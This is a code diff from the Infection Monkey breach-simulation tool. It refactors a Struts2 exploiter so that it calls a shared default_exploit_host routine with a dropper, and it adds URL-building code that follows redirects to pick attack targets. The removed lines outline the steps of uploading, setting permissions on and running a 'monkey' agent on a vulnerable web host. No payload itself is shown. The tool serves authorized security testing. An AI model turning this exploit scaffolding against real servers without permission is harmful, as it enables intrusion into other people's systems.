Struts2 refactored to use default_exploit_host function

infection_monkey/exploit/struts2.py

@@ -10,7 +10,7 @@ import re
 
 import logging
 from web_rce import WebRCE
-import copy
+from posixpath import join
 
 __author__ = "VakarisZ"
 
@@ -23,45 +23,36 @@ class Struts2Exploiter(WebRCE):
     _TARGET_OS_TYPE = ['linux', 'windows']
 
     def __init__(self, host):
-        super(Struts2Exploiter, self).__init__(host)
+        super(Struts2Exploiter, self).__init__(host, None)
 
     def exploit_host(self):
-        # Get open ports
+        return self.default_exploit_host(dropper=True)
-        ports = self.get_ports_w(self.HTTP, ["http"])
-        if not ports:
-            return False
-        # Get urls to try to exploit
-        urls = self.build_potential_urls(ports)
-        vulnerable_urls = []
-        for url in urls:
-            # Get full URL
-            url = self.get_redirected(url)
-            if self.check_if_exploitable(url):
-                vulnerable_urls.append(url)
-        self._exploit_info['vulnerable_urls'] = vulnerable_urls
-        if not vulnerable_urls:
-            return False
 
-        if self.skip_exist and self.check_remote_files(vulnerable_urls[0]):
+    def build_potential_urls(self, ports, extensions=None):
-            LOG.info("Host %s was already infected under the current configuration, done" % self.host)
+        """
-            return True
+        We need to override this method to get redirected url's
-
+        :param ports: Array of ports. One port is described as size 2 array: [port.no(int), isHTTPS?(bool)]
-        if not self.set_host_arch(vulnerable_urls[0]):
+        Eg. ports: [[80, False], [443, True]]
-            return False
+        :param extensions: What subdirectories to scan. www.domain.com[/extension]
-
+        :return: Array of url's to try and attack
-        data = self.upload_monkey(vulnerable_urls[0])
+        """
-
+        url_list = []
-        # We can't use 'if not' because response may be ''
+        if extensions:
-        if data is not False and data['response'] is False:
+            extensions = [(e[1:] if '/' == e[0] else e) for e in extensions]
-            return False
+        else:
-
+            extensions = [""]
-        if self.change_permissions(vulnerable_urls[0], data['path']) is False:
+        for port in ports:
-            return False
+            for extension in extensions:
-
+                if port[1]:
-        if self.execute_remote_monkey(vulnerable_urls[0], data['path'], True) is False:
+                    protocol = "https"
-            return False
+                else:
-
+                    protocol = "http"
-        return True
+                url = join(("%s://%s:%s" % (protocol, self.host.ip_addr, port[0])), extension)
+                redirected_url = self.get_redirected(url)
+                url_list.append(redirected_url)
+        if not url_list:
+            LOG.info("No attack url's were built")
+        return url_list
 
     @staticmethod
     def get_redirected(url):